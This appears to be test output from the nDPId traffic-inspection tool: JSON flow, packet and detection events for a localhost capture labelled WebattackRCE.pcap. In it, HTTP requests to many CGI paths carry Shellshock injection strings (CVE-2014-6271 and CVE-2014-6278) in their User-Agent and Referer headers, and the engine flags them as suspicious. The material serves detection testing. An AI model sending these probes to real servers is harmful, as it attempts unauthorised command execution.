+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 